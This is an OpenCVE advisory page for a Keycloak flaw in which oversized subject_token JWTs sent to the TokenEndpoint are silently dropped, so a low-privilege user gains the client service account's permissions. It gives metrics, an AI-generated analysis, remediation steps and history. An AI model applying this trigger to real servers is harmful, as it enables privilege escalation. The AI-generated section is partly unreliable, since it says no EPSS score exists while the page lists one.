Description
A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation.
Published: 2026-05-27
Score: 6.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An authenticated user with low-level privileges can use an oversized subject_token JSON Web Token sent to the Keycloak TokenEndpoint. If the JWT exceeds 4000 characters, the server silently drops it and automatically falls back to client credentials. This fallback hands the attacker the full permissions of the client’s service account, allowing privilege escalation.

Affected Systems

Red Hat’s Build of Keycloak is affected. The CVE does not list specific product versions, so all deployed instances of this vendor’s Keycloak distribution are potentially impacted until patched.

Risk and Exploitability

The vulnerability has a CVSS score of 6.8 and is not listed in the CISA KEV catalog. No public EPSS score is available. Exploitation requires an authenticated session, so an attacker must first gain user access. Once authenticated, the attacker can send a crafted, oversized JWT to the TokenEndpoint and obtain client‑level privileges through the silent token drop, effectively bypassing normal access controls.

Generated by OpenCVE AI on May 27, 2026 at 20:31 UTC.

Remediation

Vendor Workaround

To prevent the silent dropping of oversized `subject_token` JWTs, configure Keycloak to enforce strict parameter validation. This involves setting the `fail-fast` parameter to `true` for the `TokenEndpoint` configuration, which will cause requests with oversized parameters to be rejected explicitly rather than silently processed with reduced privileges. Consult Keycloak documentation for the exact method to modify these settings. A restart of the Keycloak service may be necessary for the changes to apply.

OpenCVE Recommended Actions

  • Deploy the latest Keycloak update from Red Hat that resolves the oversized JWT handling.
  • If the patch cannot be applied immediately, configure TokenEndpoint "fail‑fast" to true so that oversized tokens are rejected instead of silently dropped.
  • Restart the Keycloak service after applying the configuration change.

Generated by OpenCVE AI on May 27, 2026 at 20:31 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 28 May 2026 01:45:00 +0000

Type Values Removed Values Added
First Time appeared Redhat build Of Keycloak
Vendors & Products Redhat build Of Keycloak

Thu, 28 May 2026 00:15:00 +0000

Type Values Removed Values Added
References
Metrics threat_severity

None

 threat_severity

Moderate

Wed, 27 May 2026 17:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 27 May 2026 14:15:00 +0000

Type Values Removed Values Added
Description A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation.
Title Keycloak: keycloak: privilege escalation due to oversized subject_token jwt
First Time appeared Redhat
Redhat build Keycloak
Weaknesses CWE-1284
CPEs cpe:/a:redhat:build_keycloak:
Vendors & Products Redhat
Redhat build Keycloak
References
Metrics cvssV3_1

{'score': 6.8, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}

Subscriptions

Redhat Build Keycloak Build Of Keycloak
cve-icon MITRE

Status: PUBLISHED

Assigner: redhat

Published:

Updated: 2026-05-27T15:29:26.036Z

Reserved: 2026-05-27T12:39:12.284Z

Link: CVE-2026-9704

cve-icon Vulnrichment

Updated: 2026-05-27T15:29:23.173Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-05-27T14:17:40.480

Modified: 2026-05-27T14:54:20.160

Link: CVE-2026-9704

cve-icon Redhat

Severity : Moderate

Publid Date: 2026-05-27T12:45:59Z

Links: CVE-2026-9704 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-05-28T01:30:03Z

Weaknesses